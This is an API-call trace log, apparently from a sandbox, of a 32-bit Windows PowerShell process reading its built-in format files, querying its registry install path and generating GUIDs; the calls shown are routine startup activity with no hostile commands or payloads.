	[0225.211] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.212] GetLastError () returned 0x0
	[0225.212] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.212] GetLastError () returned 0x0
	[0225.212] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.212] GetLastError () returned 0x0
	[0225.212] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.212] GetLastError () returned 0x0
	[0225.212] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.212] GetLastError () returned 0x0
	[0225.213] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.213] GetLastError () returned 0x0
	[0225.213] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0xf37, lpOverlapped=0x0) returned 1
	[0225.213] GetLastError () returned 0x0
	[0225.213] ReadFile (in: hFile=0x358, lpBuffer=0x2db8e43, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db8e43*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.213] GetLastError () returned 0x0
	[0225.213] ReadFile (in: hFile=0x358, lpBuffer=0x2db976c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x2db976c*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.213] GetLastError () returned 0x0
	[0225.213] CloseHandle (hObject=0x358) returned 1
	[0225.213] GetLastError () returned 0x0
	[0225.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.214] GetLastError () returned 0x0
	[0225.214] SetErrorMode (uMode=0x1) returned 0x1
	[0225.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2dda768 | out: lpFileInformation=0x2dda768*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0225.214] GetLastError () returned 0x0
	[0225.214] SetErrorMode (uMode=0x1) returned 0x1
	[0225.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.214] GetLastError () returned 0x0
	[0225.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.214] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.214] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.215] RegCloseKey (hKey=0x358) returned 0x0
	[0225.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.215] GetLastError () returned 0x0
	[0225.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0225.215] GetLastError () returned 0x0
	[0225.321] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x6ec4af6, Data2=0x7c63, Data3=0x44ca, Data4=([0]=0xb3, [1]=0xf, [2]=0xb9, [3]=0x92, [4]=0x13, [5]=0x1, [6]=0x7, [7]=0x87))) returned 0x0
	[0225.321] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x75c9156d, Data2=0x6519, Data3=0x450b, Data4=([0]=0x91, [1]=0x75, [2]=0x2d, [3]=0xd1, [4]=0x2, [5]=0xac, [6]=0xfa, [7]=0x23))) returned 0x0
	[0225.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.321] GetLastError () returned 0x0
	[0225.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.321] GetLastError () returned 0x0
	[0225.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.321] GetLastError () returned 0x0
	[0225.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.321] GetLastError () returned 0x0
	[0225.456] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd0561517, Data2=0x7236, Data3=0x4e66, Data4=([0]=0x88, [1]=0x26, [2]=0x42, [3]=0xdc, [4]=0x20, [5]=0x53, [6]=0xae, [7]=0xe2))) returned 0x0
	[0225.460] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x15fb5d26, Data2=0x9eb, Data3=0x40dc, Data4=([0]=0xa0, [1]=0xde, [2]=0x72, [3]=0x47, [4]=0x39, [5]=0x94, [6]=0x60, [7]=0x3e))) returned 0x0
	[0225.465] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd20e44d2, Data2=0x359f, Data3=0x40d3, Data4=([0]=0x97, [1]=0xf0, [2]=0x8d, [3]=0x5, [4]=0xbb, [5]=0x4, [6]=0x0, [7]=0x45))) returned 0x0
	[0225.465] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xce180957, Data2=0xc5f2, Data3=0x44b5, Data4=([0]=0x97, [1]=0x35, [2]=0x8e, [3]=0x46, [4]=0xfd, [5]=0x95, [6]=0x52, [7]=0xb0))) returned 0x0
	[0225.474] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x883e6483, Data2=0x5948, Data3=0x40a3, Data4=([0]=0x9f, [1]=0x0, [2]=0x68, [3]=0xd, [4]=0xf7, [5]=0x8a, [6]=0x46, [7]=0x70))) returned 0x0
	[0225.476] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x381b6994, Data2=0x5857, Data3=0x4e7b, Data4=([0]=0x9b, [1]=0x84, [2]=0x92, [3]=0x50, [4]=0x92, [5]=0xe1, [6]=0x7a, [7]=0xfc))) returned 0x0
	[0225.477] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa31563b2, Data2=0xe6d7, Data3=0x46c8, Data4=([0]=0x87, [1]=0xaf, [2]=0x22, [3]=0x17, [4]=0x7a, [5]=0x2e, [6]=0x91, [7]=0xd0))) returned 0x0
	[0225.478] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x1258f3d0, Data2=0x8b83, Data3=0x498b, Data4=([0]=0xb7, [1]=0x1a, [2]=0x9c, [3]=0x7c, [4]=0x32, [5]=0x92, [6]=0xa7, [7]=0x1a))) returned 0x0
	[0225.478] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd66aa677, Data2=0x7e81, Data3=0x4404, Data4=([0]=0xa5, [1]=0x2f, [2]=0xc3, [3]=0x24, [4]=0xda, [5]=0xc8, [6]=0x72, [7]=0xc0))) returned 0x0
	[0225.479] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x9674dabb, Data2=0xdb3, Data3=0x447d, Data4=([0]=0xa0, [1]=0x48, [2]=0x67, [3]=0x88, [4]=0xb6, [5]=0x48, [6]=0xe7, [7]=0x6d))) returned 0x0
	[0225.479] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x251eeedd, Data2=0x671a, Data3=0x4763, Data4=([0]=0xbb, [1]=0xa7, [2]=0x7, [3]=0x5e, [4]=0x2b, [5]=0xae, [6]=0xce, [7]=0x38))) returned 0x0
	[0225.479] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x34478a70, Data2=0x4727, Data3=0x4358, Data4=([0]=0x9f, [1]=0xd0, [2]=0x42, [3]=0xd0, [4]=0x4d, [5]=0xbc, [6]=0x44, [7]=0xcf))) returned 0x0
	[0225.480] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe129907e, Data2=0xe6f4, Data3=0x45ca, Data4=([0]=0x94, [1]=0x7e, [2]=0x9f, [3]=0x0, [4]=0xc8, [5]=0x2d, [6]=0xf5, [7]=0x43))) returned 0x0
	[0225.485] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xeb80e8e5, Data2=0xb83f, Data3=0x4326, Data4=([0]=0xa1, [1]=0xa9, [2]=0xa8, [3]=0x68, [4]=0xf3, [5]=0xe9, [6]=0xf4, [7]=0xef))) returned 0x0
	[0225.489] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xbac43793, Data2=0xc894, Data3=0x48a6, Data4=([0]=0x98, [1]=0x47, [2]=0xa, [3]=0xe2, [4]=0xcb, [5]=0xc4, [6]=0x4, [7]=0x9d))) returned 0x0
	[0225.491] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x6f2189ca, Data2=0xaf78, Data3=0x4483, Data4=([0]=0xa4, [1]=0xb, [2]=0xb5, [3]=0x3f, [4]=0xdf, [5]=0x3f, [6]=0xe2, [7]=0x81))) returned 0x0
	[0225.492] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xe4bc0cde, Data2=0xe3bc, Data3=0x4f9c, Data4=([0]=0x9a, [1]=0x74, [2]=0xeb, [3]=0x9, [4]=0x45, [5]=0x15, [6]=0xd2, [7]=0xc4))) returned 0x0
	[0225.492] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x516afaef, Data2=0x9969, Data3=0x481f, Data4=([0]=0x8d, [1]=0x2b, [2]=0x71, [3]=0x28, [4]=0x89, [5]=0xaa, [6]=0x21, [7]=0xa9))) returned 0x0
	[0225.492] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x2cb8808a, Data2=0x271c, Data3=0x480f, Data4=([0]=0xb9, [1]=0xa0, [2]=0x74, [3]=0x98, [4]=0xb3, [5]=0x71, [6]=0x61, [7]=0x27))) returned 0x0
	[0225.493] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x48de08d0, Data2=0xfa68, Data3=0x40d3, Data4=([0]=0xbc, [1]=0x30, [2]=0x33, [3]=0x85, [4]=0x6e, [5]=0x7b, [6]=0xc1, [7]=0x7f))) returned 0x0
	[0225.493] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x64613531, Data2=0x3ded, Data3=0x4a8f, Data4=([0]=0x80, [1]=0x7e, [2]=0xa4, [3]=0xf8, [4]=0xea, [5]=0x9c, [6]=0xaa, [7]=0xd7))) returned 0x0
	[0225.494] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd3e5eb5, Data2=0xbf8c, Data3=0x496d, Data4=([0]=0xac, [1]=0x22, [2]=0xa3, [3]=0x75, [4]=0x3a, [5]=0xa1, [6]=0xdd, [7]=0x64))) returned 0x0
	[0225.494] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x97483da8, Data2=0xb639, Data3=0x4757, Data4=([0]=0x8c, [1]=0xf2, [2]=0x4b, [3]=0xa2, [4]=0xa3, [5]=0xed, [6]=0x49, [7]=0xd8))) returned 0x0
	[0225.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0225.495] GetLastError () returned 0x0
	[0225.495] SetErrorMode (uMode=0x1) returned 0x1
	[0225.495] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0225.495] GetLastError () returned 0x0
	[0225.495] GetFileType (hFile=0x358) returned 0x1
	[0225.495] SetErrorMode (uMode=0x1) returned 0x1
	[0225.495] GetFileType (hFile=0x358) returned 0x1
	[0225.495] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.496] GetLastError () returned 0x0
	[0225.496] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.496] GetLastError () returned 0x0
	[0225.497] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.497] GetLastError () returned 0x0
	[0225.497] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.498] GetLastError () returned 0x0
	[0225.498] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.498] GetLastError () returned 0x0
	[0225.593] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.593] GetLastError () returned 0x0
	[0225.593] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.593] GetLastError () returned 0x0
	[0225.593] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.593] GetLastError () returned 0x0
	[0225.593] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.593] GetLastError () returned 0x0
	[0225.595] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.595] GetLastError () returned 0x0
	[0225.595] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.595] GetLastError () returned 0x0
	[0225.595] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.595] GetLastError () returned 0x0
	[0225.595] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.595] GetLastError () returned 0x0
	[0225.596] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.596] GetLastError () returned 0x0
	[0225.596] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.596] GetLastError () returned 0x0
	[0225.596] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.596] GetLastError () returned 0x0
	[0225.596] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.596] GetLastError () returned 0x0
	[0225.599] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.599] GetLastError () returned 0x0
	[0225.599] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.599] GetLastError () returned 0x0
	[0225.599] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.599] GetLastError () returned 0x0
	[0225.599] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0225.599] GetLastError () returned 0x0
	[0225.600] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0xe67, lpOverlapped=0x0) returned 1
	[0225.600] GetLastError () returned 0x0
	[0225.600] ReadFile (in: hFile=0x358, lpBuffer=0x30858eb, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30858eb*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.600] GetLastError () returned 0x0
	[0225.600] ReadFile (in: hFile=0x358, lpBuffer=0x30862e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae9b4, lpOverlapped=0x0 | out: lpBuffer=0x30862e4*, lpNumberOfBytesRead=0xae9b4*=0x0, lpOverlapped=0x0) returned 1
	[0225.600] GetLastError () returned 0x0
	[0225.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae938 | out: phkResult=0xae938*=0x358) returned 0x0
	[0225.601] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x0, lpcbData=0xae97c*=0x0 | out: lpType=0xae980*=0x1, lpData=0x0, lpcbData=0xae97c*=0x56) returned 0x0
	[0225.601] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae980, lpData=0x3582a0, lpcbData=0xae97c*=0x56 | out: lpType=0xae980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae97c*=0x56) returned 0x0
	[0225.601] RegCloseKey (hKey=0x358) returned 0x0
	[0225.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0225.601] GetLastError () returned 0x0
	[0225.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0225.601] GetLastError () returned 0x0
	[0225.606] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa7848b31, Data2=0x56b7, Data3=0x4aaf, Data4=([0]=0x93, [1]=0x9e, [2]=0xb4, [3]=0x5f, [4]=0x59, [5]=0x66, [6]=0x4e, [7]=0xbb))) returned 0x0
	[0225.607] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xf5c889eb, Data2=0x18cd, Data3=0x4802, Data4=([0]=0x9c, [1]=0x86, [2]=0x87, [3]=0x28, [4]=0xa8, [5]=0x7b, [6]=0x5c, [7]=0xec))) returned 0x0
	[0225.607] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x71218ede, Data2=0xefc1, Data3=0x44c3, Data4=([0]=0xb6, [1]=0xf1, [2]=0x7c, [3]=0x21, [4]=0x4a, [5]=0xa1, [6]=0x75, [7]=0x5d))) returned 0x0
	[0225.607] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x76696914, Data2=0xaca2, Data3=0x4013, Data4=([0]=0xa6, [1]=0x8a, [2]=0x8f, [3]=0x8d, [4]=0x55, [5]=0xc3, [6]=0x3b, [7]=0xa8))) returned 0x0
	[0225.607] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xa7bd8b0c, Data2=0x87e1, Data3=0x4f63, Data4=([0]=0xa4, [1]=0x6, [2]=0x7, [3]=0x41, [4]=0xbd, [5]=0x54, [6]=0x25, [7]=0x89))) returned 0x0
	[0225.607] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0xd38774e7, Data2=0x58c, Data3=0x44db, Data4=([0]=0xb1, [1]=0x32, [2]=0xa2, [3]=0x4a, [4]=0x84, [5]=0xa5, [6]=0xab, [7]=0x9))) returned 0x0
	[0225.608] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x753b211d, Data2=0xb2f9, Data3=0x41df, Data4=([0]=0xa9, [1]=0x92, [2]=0x23, [3]=0xca, [4]=0x86, [5]=0xc7, [6]=0xa9, [7]=0xa8))) returned 0x0
	[0225.609] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x217af25c, Data2=0x7652, Data3=0x4b27, Data4=([0]=0xbb, [1]=0x45, [2]=0xe2, [3]=0xd5, [4]=0x87, [5]=0xb3, [6]=0xba, [7]=0x7a))) returned 0x0
	[0225.609] CoCreateGuid (in: pguid=0xae9a8 | out: pguid=0xae9a8*(Data1=0x49c27196, Data2=0xc4d3, Data3=0x4142, Data4=([0]=0xb8, [1]=0xea, [2]=0x3a, [3]=0xf3, [4]=0xe0, [5]=0x9c, [6]=0xc9, [7]=0x61))) returned 0x0
